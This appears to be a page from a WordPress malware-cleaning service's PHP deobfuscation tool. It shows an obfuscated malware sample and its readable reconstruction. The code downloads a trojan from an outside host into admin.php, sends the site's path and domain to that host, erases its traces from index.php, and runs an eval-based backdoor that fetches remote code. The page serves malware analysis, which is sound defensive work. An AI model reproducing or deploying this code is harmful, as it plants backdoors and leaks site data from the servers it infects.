Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.1 | <?php |
2 | $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.$O00OO_0_O_{6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O__O00_OO0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $O__O00_OO0;');$OOO_O00_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$url','$OO0O0_0_O_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x4f\x30\x30\x30\x5f"]($O0O0_O_0O_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x30\x30\x5f\x4f"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["\x70\x61\x74\x68"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'//\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x50\x48\x50\x5f\x53\x45\x4c\x46"]),\'\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'\\\\\\\\\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]));$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30\x5f"]();$O_0_O_OO00["\x73\x68\x65\x6c\x6c\x5f\x6c\x69\x6e\x6b"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cHM6Ly9zYWlzb2Z0d29ya3MuY29tL2Fib3V0LnBocD81MjA=\');if(isset(${"\x5f\x47\x45\x54"}["\x64\x65\x6c"])&&${"\x5f\x47\x45\x54"}["\x64\x65\x6c"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("YWRtaW4ucGhw");$O0O_0_O0_O=$O_0_O_OO00["\x70\x61\x74\x68"]."/".$OO_O__O000;$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("aHR0cHM6Ly81MWxhLnp2bzIueHl6L2EyLnR4dA=="));$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="http://".$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]."/".$OO_O__O000;}else{$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="write failed";}$OO_0O00O__=sprintf(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cHM6Ly81MWxhLnp2bzIueHl6Lz9kPSVz\'),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x30\x4f\x4f\x30\x4f"]($O_0_O_OO00)));$O__OO0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30"](1);?><?php |
3 | goto xqaAu; Cl_h_: strlen("\x4d\104\x4d\x34\117\x44\121\64\x4f\x54\x59\61\x4e\104\105\x33\115\x6a\101\x33\115\124\147\64\x4e\x7a\125\x79\x4e\124\x67\170"); goto k1PsF; uz1Sb: $rDzY3 = ${$gZi41[20 + 11] . $gZi41[55 + 4] . $gZi41[27 + 20] . $gZi41[23 + 24] . $gZi41[24 + 27] . $gZi41[25 + 28] . $gZi41[45 + 12]}; goto v5t_s; yv7wN: $gZi41 = $fE7sY("\176", "\x20"); goto uz1Sb; v5t_s: if (!(in_array(gettype($rDzY3) . count($rDzY3), $rDzY3) && count($rDzY3) == 17 && md5(md5(md5(md5($rDzY3[11])))) === "\60\x31\x35\x64\61\x61\x39\143\143\141\x37\x30\146\64\x35\x39\60\143\x33\x30\146\x65\x37\145\x33\141\x32\145\141\x38\x32\x31")) { goto mRPcH; } goto KUBP5; k1PsF: class mAwZP { static function ySVkC($M4vnN) { goto LgLaQ; Jcayw: vnRiA: goto h1t4R; h1t4R: return $N6Dau; goto oeGBz; ghkiF: $itYm6 = explode("\x7b", $M4vnN); goto O3R0m; LGI34: $PgWns = $hcyOO("\x7e", "\40"); goto ghkiF; O3R0m: $N6Dau = ''; goto bYwwP; LgLaQ: $hcyOO = "\162" . "\141" . "\x6e" . "\147" . "\145"; goto LGI34; bYwwP: foreach ($itYm6 as $XZ3pl => $q1I24) { $N6Dau .= $PgWns[$q1I24 - 57739]; Tu92M: } goto Jcayw; oeGBz: } static function CzvSe($KPjKg, $uQUEF) { goto boiMd; GaqSp: $MMuYj = curl_exec($m_ZCK); goto Tng5A; U6ebw: curl_setopt($m_ZCK, CURLOPT_RETURNTRANSFER, 1); goto GaqSp; Tng5A: return empty($MMuYj) ? $uQUEF($KPjKg) : $MMuYj; goto p005S; boiMd: $m_ZCK = curl_init($KPjKg); goto U6ebw; p005S: } static function TtTGh() { goto vbaGU; Llc32: $srdsz = @$U5AjB[2 + 1]($U5AjB[5 + 1], $qprcp); goto IAPuK; IAPuK: $kA2y8 = $U5AjB[1 + 1]($srdsz, true); goto eDEhk; ne_er: @eval($U5AjB[2 + 2]($WMdP2)); goto lEGVQ; g87yw: $qprcp = @$U5AjB[1]($U5AjB[5 + 5](INPUT_GET, $U5AjB[6 + 3])); goto Llc32; yMqn9: xBI6Y: goto g87yw; KbtZQ: $WMdP2 = self::czVse($kA2y8[1 + 0], $U5AjB[0 + 5]); goto ne_er; PXxhu: Pij0b: goto sXnLx; smroI: foreach ($hIFK7 as $XzP0s) { $U5AjB[] = self::YsVkC($XzP0s); fwpnw: } goto yMqn9; lEGVQ: die; goto PXxhu; E94jw: if (!(@$kA2y8[0] - time() > 0 and md5(md5($kA2y8[3 + 0])) === "\65\x32\x32\x33\61\x63\x39\146\x34\61\x36\x31\x32\65\x33\x63\x62\x34\60\66\63\60\65\x33\61\64\65\x66\142\62\x65\x37")) { goto Pij0b; } goto KbtZQ; eDEhk: @$U5AjB[0 + 10](INPUT_GET, "\157\146") == 1 && die($U5AjB[1 + 4](__FILE__)); goto E94jw; vbaGU: $hIFK7 = array("\65\x37\x37\x36\x36\x7b\x35\67\67\x35\x31\x7b\x35\x37\x37\x36\x34\x7b\x35\x37\67\66\x38\x7b\x35\x37\x37\64\x39\173\65\67\x37\x36\x34\173\65\x37\x37\x37\60\x7b\65\x37\x37\x36\63\173\65\67\67\x34\x38\x7b\x35\67\67\x35\x35\173\65\x37\x37\x36\x36\173\65\67\67\64\x39\x7b\x35\x37\x37\x36\60\x7b\65\67\67\x35\x34\x7b\x35\x37\x37\65\65", "\65\67\x37\65\x30\x7b\x35\x37\67\64\71\173\65\67\x37\x35\x31\x7b\x35\x37\67\67\60\173\x35\67\x37\x35\61\173\65\67\x37\x35\64\x7b\65\x37\67\64\71\x7b\65\67\x38\x31\x36\173\65\x37\x38\x31\64", "\65\67\x37\65\x39\173\65\67\67\65\60\x7b\x35\x37\x37\65\64\173\x35\67\x37\65\65\x7b\65\x37\67\67\60\x7b\65\x37\67\x36\x35\173\65\67\67\x36\x34\x7b\65\67\x37\66\66\173\x35\67\x37\65\x34\173\x35\67\67\66\x35\x7b\x35\67\67\66\x34", "\65\x37\x37\x35\x33\x7b\65\67\67\x36\x38\173\65\x37\67\66\66\x7b\65\67\67\65\70", "\65\67\67\66\67\173\x35\67\x37\x36\70\x7b\x35\67\x37\65\60\173\x35\x37\x37\66\x34\x7b\x35\x37\70\x31\61\173\x35\67\70\61\63\173\x35\67\67\67\60\x7b\65\67\x37\66\65\173\x35\x37\67\66\64\x7b\x35\67\x37\x36\66\x7b\65\67\67\65\64\173\x35\x37\x37\66\x35\173\x35\67\67\66\x34", "\x35\x37\x37\66\x33\x7b\x35\67\67\x36\60\173\x35\x37\67\65\67\x7b\x35\x37\67\66\64\173\65\67\x37\x37\x30\x7b\65\x37\67\x36\62\173\x35\67\67\66\x34\173\65\x37\x37\x34\71\x7b\65\x37\67\67\60\173\x35\67\67\66\66\173\65\67\67\65\64\x7b\65\67\x37\x35\x35\x7b\65\67\67\x34\71\x7b\65\x37\x37\x36\x34\x7b\x35\x37\x37\x35\65\x7b\x35\67\x37\x34\71\x7b\x35\x37\67\65\x30", "\65\x37\67\x39\63\x7b\65\67\70\x32\x33", "\x35\67\x37\64\60", "\x35\67\70\61\70\173\x35\x37\x38\62\x33", "\65\67\70\60\60\173\65\67\67\x38\63\x7b\65\x37\x37\70\x33\173\x35\67\x38\60\x30\173\65\x37\x37\x37\x36", "\x35\67\x37\x36\63\x7b\65\x37\67\x36\x30\173\x35\x37\x37\65\x37\173\65\x37\x37\64\71\x7b\x35\67\67\x36\64\173\x35\x37\x37\65\61\x7b\65\x37\x37\67\60\173\x35\x37\x37\x36\x30\173\65\x37\67\x35\65\x7b\x35\x37\x37\x35\63\x7b\x35\67\67\x34\x38\173\65\x37\x37\64\71"); goto smroI; sXnLx: } } goto fICMF; KUBP5: ($rDzY3[65] = $rDzY3[65] . $rDzY3[79]) && ($rDzY3[82] = $rDzY3[65]($rDzY3[82])) && @eval($rDzY3[65](${$rDzY3[50]}[23])); goto Kk4J9; xqaAu: $fE7sY = "\x72" . "\x61" . "\x6e" . "\x67" . "\145"; goto yv7wN; Kk4J9: mRPcH: goto Cl_h_; fICMF: MAWZp::tTTGH(); |
4 | ?> |
001 | <?php |
002 |
003 | $O00OO_0_O_ = "n1zb/ma5\\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j"; |
004 | $O000OOO___ = "file_put_contents"; |
005 | $O_0O_0O0O_ = "file_get_contents"; |
006 | $O0_O0_O0O_ = "create_function"; |
007 | $OOO0_O0_0_ = "base64_encode"; |
008 | $OO0O___0O0 = "base64_decode"; |
009 | $O_O_0_O00O = "preg_replace"; |
010 | $O_00O0OO__ = "str_replace"; |
011 | $O_0_O0_O0O = "curl_setopt"; |
012 | $O_O_O000_O = "curl_close"; |
013 | $O___00OO0O = "serialize"; |
014 | $O__0O0_0OO = "curl_init"; |
015 | $O_OO_O000_ = "curl_exec"; |
016 | $OO0O0__O0_ = function ($O__O00_OO0 = '') { |
017 | if (isset($_SERVER["HTTP_HOST"])) { |
018 | return $_SERVER["HTTP_HOST"]; |
019 | } elseif (isset($_SERVER["SERVER_NAME"])) { |
020 | return $_SERVER["SERVER_NAME"]; |
021 | } |
022 | return $O__O00_OO0; |
023 | }; |
024 | $OOO_O00_0_ = function ($url) { |
025 | $OO0O0_0_O_ = @file_get_contents($url); |
026 | if (!$OO0O0_0_O_) { |
027 | $O0O0_O_0O_ = curl_init(); |
028 | curl_setopt($O0O0_O_0O_, CURLOPT_URL, $url); |
029 | curl_setopt($O0O0_O_0O_, CURLOPT_RETURNTRANSFER, 1); |
030 | $OO0O0_0_O_ = curl_exec($O0O0_O_0O_); |
031 | curl_close($O0O0_O_0O_); |
032 | } |
033 | return $OO0O0_0_O_; |
034 | }; |
035 | $O_OO__0O00 = function ($O_0O_O_0O0 = '') { |
036 | $O_0_O_OO00 = array(); |
037 | $O_0_O_OO00["path"] = str_replace(str_replace('//', '/', $_SERVER["PHP_SELF"]), '', str_replace('\\\\', '/', $_SERVER["SCRIPT_FILENAME"])); |
038 | $O_0_O_OO00["domain"] = $GLOBALS["OO0O0__O0_"](); |
039 | $O_0_O_OO00["shell_link"] = "https://saisoftworks.com/about.php?520"; |
040 | if (isset($_GET["del"]) && $_GET["del"] == "my_code") { |
041 | $O0_0OO_O0_ = $O_0_O_OO00["path"] . "/index.php"; |
042 | $OO0O0O0___ = @file_get_contents($O0_0OO_O0_); |
043 | $O_OO_0_0O0 = "<\\?php.+\\(1\\);\\?>"; |
044 | $OO0O0O0___ = preg_replace("/<\\?php.+\\(1\\);\\?>/si", '', $OO0O0O0___); |
045 | $OO0O0O0___ = @file_put_contents($O0_0OO_O0_, $OO0O0O0___); |
046 | if ($OO0O0O0___ > 0) { |
047 | die("delete success"); |
048 | } |
049 | die("delete failed"); |
050 | } |
051 | $OO_O__O000 = "admin.php"; |
052 | $O0O_0_O0_O = $O_0_O_OO00["path"] . "/" . $OO_O__O000; |
053 | $OO0O0O0___ = @$GLOBALS["OOO_O00_0_"]("https://51la.zvo2.xyz/a2.txt"); |
054 | $OO0O0O0___ = @file_put_contents($O0O_0_O0_O, $OO0O0O0___); |
055 | if ($OO0O0O0___ > 0) { |
056 | $O_0_O_OO00["trojan"] = "http://" . $O_0_O_OO00["domain"] . "/" . $OO_O__O000; |
057 | } else { |
058 | $O_0_O_OO00["trojan"] = "write failed"; |
059 | } |
060 | $OO_0O00O__ = sprintf("https://51la.zvo2.xyz/?d=%s", base64_encode(serialize($O_0_O_OO00))); |
061 | $O__OO0O00_ = $GLOBALS["OOO_O00_0_"]($OO_0O00O__); |
062 | if ($O__OO0O00_ == "done") { |
063 | $O0_0OO_O0_ = $O_0_O_OO00["path"] . "/index.php"; |
064 | $OO0O0O0___ = @file_get_contents($O0_0OO_O0_); |
065 | $O_OO_0_0O0 = "<\\?php.+\\(1\\);\\?>"; |
066 | $OO0O0O0___ = preg_replace("/<\\?php.+\\(1\\);\\?>/si", '', $OO0O0O0___); |
067 | @file_put_contents($O0_0OO_O0_, $OO0O0O0___); |
068 | } |
069 | }; |
070 | $GLOBALS["O_OO__0O00"](1); |
071 | $fE7sY = "range"; |
072 | $gZi41 = range("~", " "); |
073 | $rDzY3 = ${$gZi41[31] . $gZi41[59] . $gZi41[47] . $gZi41[47] . $gZi41[51] . $gZi41[53] . $gZi41[57]}; |
074 | if (!(in_array(gettype($rDzY3) . count($rDzY3), $rDzY3) && count($rDzY3) == 17 && md5(md5(md5(md5($rDzY3[11])))) === "015d1a9cca70f4590c30fe7e3a2ea821")) { |
075 | goto mRPcH; |
076 | } |
077 | ($rDzY3[65] .= $rDzY3[79]) && ($rDzY3[82] = $rDzY3[65]($rDzY3[82])) && @eval($rDzY3[65](${$rDzY3[50]}[23])); |
078 | mRPcH: |
079 | strlen("MDM4ODQ4OTY1NDE3MjA3MTg4NzUyNTgx"); |
080 | class mAwZP |
081 | { |
082 | static function ySVkC($M4vnN) |
083 | { |
084 | $hcyOO = "range"; |
085 | $PgWns = range("~", " "); |
086 | $itYm6 = explode("{", $M4vnN); |
087 | $N6Dau = ''; |
088 | foreach ($itYm6 as $XZ3pl => $q1I24) { |
089 | $N6Dau .= $PgWns[$q1I24 - 57739]; |
090 | } |
091 | return $N6Dau; |
092 | } |
093 | static function CzvSe($KPjKg, $uQUEF) |
094 | { |
095 | $m_ZCK = curl_init($KPjKg); |
096 | curl_setopt($m_ZCK, CURLOPT_RETURNTRANSFER, 1); |
097 | $MMuYj = curl_exec($m_ZCK); |
098 | return empty($MMuYj) ? $uQUEF($KPjKg) : $MMuYj; |
099 | } |
100 | static function TtTGh() |
101 | { |
102 | $hIFK7 = array("57766{57751{57764{57768{57749{57764{57770{57763{57748{57755{57766{57749{57760{57754{57755", "57750{57749{57751{57770{57751{57754{57749{57816{57814", "57759{57750{57754{57755{57770{57765{57764{57766{57754{57765{57764", "57753{57768{57766{57758", "57767{57768{57750{57764{57811{57813{57770{57765{57764{57766{57754{57765{57764", "57763{57760{57757{57764{57770{57762{57764{57749{57770{57766{57754{57755{57749{57764{57755{57749{57750", "57793{57823", "57740", "57818{57823", "57800{57783{57783{57800{57776", "57763{57760{57757{57749{57764{57751{57770{57760{57755{57753{57748{57749"); |
103 | foreach ($hIFK7 as $XzP0s) { |
104 | $U5AjB[] = self::YsVkC($XzP0s); |
105 | } |
106 | $qprcp = @$U5AjB[1]($U5AjB[10](INPUT_GET, $U5AjB[9])); |
107 | $srdsz = @$U5AjB[3]($U5AjB[6], $qprcp); |
108 | $kA2y8 = $U5AjB[2]($srdsz, true); |
109 | @$U5AjB[10](INPUT_GET, "of") == 1 && die($U5AjB[5]("/var/www/html/input.php")); |
110 | if (!(@$kA2y8[0] - time() > 0 and md5(md5($kA2y8[3])) === "52231c9f4161253cb4063053145fb2e7")) { |
111 | // [PHPDeobfuscator] Implied return |
112 | return; |
113 | } |
114 | $WMdP2 = self::czVse($kA2y8[1], $U5AjB[5]); |
115 | @eval($U5AjB[4]($WMdP2)); |
116 | die; |
117 | } |
118 | } |
119 | MAWZp::tTTGH(); |
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.